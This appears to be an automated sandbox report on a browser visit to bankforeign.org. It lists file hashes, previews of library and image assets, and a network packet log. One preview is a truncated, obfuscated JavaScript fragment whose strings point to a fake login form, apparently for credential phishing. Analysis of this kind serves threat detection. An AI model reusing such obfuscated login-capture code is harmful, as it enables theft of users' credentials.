                                                            SSDEEP:1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
                                                            MD5:2F6B11A7E914718E0290410E85366FE9
                                                            SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                            SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                            SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/jq/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adc
                                                            Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:downloaded
                                                            Size (bytes):3651
                                                            Entropy (8bit):4.094801914706141
                                                            Encrypted:false
                                                            SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/ASSETS/img/m_.svg
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:downloaded
                                                            Size (bytes):3651
                                                            Entropy (8bit):4.094801914706141
                                                            Encrypted:false
                                                            SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/o/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb9d
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:downloaded
                                                            Size (bytes):1864
                                                            Entropy (8bit):5.222032823730197
                                                            Encrypted:false
                                                            SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/x/a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb75
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 37 x 80, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):4.035372245524404
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPlAvtn/5khBxl/k4E08up:6v/lhPW6hB7Tp
                                                            MD5:6FC374CF1478B0AD63F7D3FB75CC3959
                                                            SHA1:D614A38519C11479C9BC1769163F54DE5C6AB72B
                                                            SHA-256:D360D570D243ED9C3FC8F403C23C217A9B16E20D337BD48AF376421A6141ABA0
                                                            SHA-512:F890D81A3B2DED82EEDE6457EB29F2C5B06D7B6C669DA673387040D41BB9D697AB4E47E86B24C142CAA6FAB8869F2B2314A0A5F75A617A7BB5F4997BDA284E70
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/84ecff284c9c7bd8/1706819895334/ZNRieHZtFjh53PU
                                                            Preview:.PNG........IHDR...%...P.......+&....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:dropped
                                                            Size (bytes):1592
                                                            Entropy (8bit):4.205005284721148
                                                            Encrypted:false
                                                            SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                            MD5:4E48046CE74F4B89D45037C90576BFAC
                                                            SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                            SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                            SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (50758)
                                                            Category:downloaded
                                                            Size (bytes):51039
                                                            Entropy (8bit):5.247253437401007
                                                            Encrypted:false
                                                            SSDEEP:768:E9Yw7GuJM+HV0cen/7Kh5rM7V4RxCKg8FW/xsXQUd+FiID65r48Hgp5HRl+:E9X7PMIM7V4R5LFAxTWyuHHgp5HRl+
                                                            MD5:67176C242E1BDC20603C878DEE836DF3
                                                            SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                            SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                                            SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/boot/a8fa5b4494ce08322db1f933d9e75f5e65bc015265ade
                                                            Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:dropped
                                                            Size (bytes):3651
                                                            Entropy (8bit):4.094801914706141
                                                            Encrypted:false
                                                            SSDEEP:96:wO4DZ+Stb/jY+eo4hAryAes9mBYYQgWLDm9:wToSBjlevudl9nO
                                                            MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                            SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                            SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                            SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (7043), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):7043
                                                            Entropy (8bit):5.2804407743048944
                                                            Encrypted:false
                                                            SSDEEP:192:wtIrjU2y/QZN5uvVRQ+tslFqEMkewx+No91m8mq9Ana1opn:wKXU2y/QZN5uvVyFq7kew0xLa1Y
                                                            MD5:B6C202188699B897BB727A68EDD24665
                                                            SHA1:FF3B891E06C983DCA277C1D7D874C8EB8084EB96
                                                            SHA-256:184A034CB9202937BF012AFF8C81E0747B7CA8F8F9E6115556FDB09D5BAEC419
                                                            SHA-512:AD8D243B156841EC27CA057CF1E0F64B8802E0DF64F79000739605CDE2C9A9FA1E3E24D153AB34A7AA66F726FC701816CA116052F4129AF3FB78D8F4057EE9F8
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/js/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adf
                                                            Preview:var _0x22d5b4=_0xe936;function _0xe936(_0x110d0f,_0x2b91a9){var _0x5afc29=_0x2e89();return _0xe936=function(_0x5e8034,_0x1649af){_0x5e8034=_0x5e8034-0x12d;var _0x41bfe8=_0x5afc29[_0x5e8034];return _0x41bfe8;},_0xe936(_0x110d0f,_0x2b91a9);}(function(_0x18f255,_0x432ca9){var _0xb8cc2=_0xe936,_0x553352=_0x18f255();while(!![]){try{var _0x1c3eea=-parseInt(_0xb8cc2(0x161))/0x1+-parseInt(_0xb8cc2(0x132))/0x2+parseInt(_0xb8cc2(0x154))/0x3+-parseInt(_0xb8cc2(0x16c))/0x4+parseInt(_0xb8cc2(0x12e))/0x5+parseInt(_0xb8cc2(0x174))/0x6+-parseInt(_0xb8cc2(0x136))/0x7;if(_0x1c3eea===_0x432ca9)break;else _0x553352['push'](_0x553352['shift']());}catch(_0x104ec1){_0x553352['push'](_0x553352['shift']());}}}(_0x2e89,0x62b01));function _0x2e89(){var _0x35743b=['log','under','prototype','usernameError','disabled','search','progressBar','removeClass','<br/>','each','json','trace','style','querySelector','opacity','none','i0116','value','location','removeAttr','reset','log_form','now','redirect','reload','.light
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:downloaded
                                                            Size (bytes):1592
                                                            Entropy (8bit):4.205005284721148
                                                            Encrypted:false
                                                            SSDEEP:48:ztSAS1OtmCtc7aIVmt4yyR9S2lKUyDWwh:RoOtmCtc7aCmVQHSRh
                                                            MD5:4E48046CE74F4B89D45037C90576BFAC
                                                            SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                            SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                            SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://bankforeign.org/ASSETS/img/sig-op.svg
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:dropped
                                                            Size (bytes):1864
                                                            Entropy (8bit):5.222032823730197
                                                            Encrypted:false
                                                            SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (38313)
                                                            Category:downloaded
                                                            Size (bytes):38314
                                                            Entropy (8bit):5.375354813236254
                                                            Encrypted:false
                                                            SSDEEP:768:fCEd/9UHAwq79HkkwcKKWN3JE+1p2EM7FPWuR3DfH6eMf7crAx:b9UHAwq79HkkwLKG3T2ER
                                                            MD5:85BEDE51198FAA96C18B083D38AF2925
                                                            SHA1:7EA03FC40DA459B251AA70CCA7DF384ECC5D07C5
                                                            SHA-256:B40E5D49A5A4E45E5B1D129BBDC3F1F7B7EF4C464063147273A47E9F4AAF825E
                                                            SHA-512:CA90BFC208C0A77BE8A7A05831BFB42564C3F6B491C8643491E414027D899D3E4DD495E5766BBB4D59A82C2C6DAC04CC065756F3EFB91B38A29AE042F968C03A
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/24864818/api.js?onload=rmxH0&render=explicit
                                                            Preview:"use strict";(function(){function ut(e,r,t,o,f,s,m){try{var p=e[s](m),g=p.value}catch(u){t(u);return}p.done?r(g):Promise.resolve(g).then(o,f)}function lt(e){return function(){var r=this,t=arguments;return new Promise(function(o,f){var s=e.apply(r,t);function m(g){ut(s,o,f,m,p,"next",g)}function p(g){ut(s,o,f,m,p,"throw",g)}m(void 0)})}}function N(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):N(e,r)}function _e(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Me(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},o=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(t).filter(function(f){return Object.getOwnPropertyDescriptor(t,f).enumerable}))),o.forEach(function(f){_e(e,f,t[f])})}return e}function st(e){if(Array.isArray(e))return e}function ft(e,r){var t=e==null?null:typeof Symbol!="und
                                                            No static file info

                                                            Download Network PCAP: filteredfull

                                                            • Total Packets: 907
                                                            • 443 (HTTPS)
                                                            • 53 (DNS)
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Feb 1, 2024 21:37:59.724240065 CET49675443192.168.2.4173.222.162.32
                                                            Feb 1, 2024 21:38:06.416440010 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.416486979 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.416552067 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.417138100 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.417155027 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.417855024 CET49731443192.168.2.464.233.185.84
                                                            Feb 1, 2024 21:38:06.417879105 CET4434973164.233.185.84192.168.2.4
                                                            Feb 1, 2024 21:38:06.417937040 CET49731443192.168.2.464.233.185.84
                                                            Feb 1, 2024 21:38:06.418529987 CET49731443192.168.2.464.233.185.84
                                                            Feb 1, 2024 21:38:06.418544054 CET4434973164.233.185.84192.168.2.4
                                                            Feb 1, 2024 21:38:06.633466005 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.634283066 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.634299994 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.634788036 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.634850025 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.635801077 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.635853052 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.640630960 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.640736103 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.641999006 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.642008066 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.649187088 CET4434973164.233.185.84192.168.2.4
                                                            Feb 1, 2024 21:38:06.649400949 CET49731443192.168.2.464.233.185.84
                                                            Feb 1, 2024 21:38:06.649430990 CET4434973164.233.185.84192.168.2.4
                                                            Feb 1, 2024 21:38:06.650907040 CET4434973164.233.185.84192.168.2.4
                                                            Feb 1, 2024 21:38:06.650965929 CET49731443192.168.2.464.233.185.84
                                                            Feb 1, 2024 21:38:06.652066946 CET49731443192.168.2.464.233.185.84
                                                            Feb 1, 2024 21:38:06.652267933 CET4434973164.233.185.84192.168.2.4
                                                            Feb 1, 2024 21:38:06.652271986 CET49731443192.168.2.464.233.185.84
                                                            Feb 1, 2024 21:38:06.691756964 CET49731443192.168.2.464.233.185.84
                                                            Feb 1, 2024 21:38:06.691785097 CET4434973164.233.185.84192.168.2.4
                                                            Feb 1, 2024 21:38:06.738634109 CET49731443192.168.2.464.233.185.84
                                                            Feb 1, 2024 21:38:06.791719913 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.842540026 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.842704058 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.842767954 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.843245029 CET49730443192.168.2.4172.217.215.139
                                                            Feb 1, 2024 21:38:06.843260050 CET44349730172.217.215.139192.168.2.4
                                                            Feb 1, 2024 21:38:06.888673067 CET4434973164.233.185.84192.168.2.4
                                                            Feb 1, 2024 21:38:06.889060974 CET4434973164.233.185.84192.168.2.4
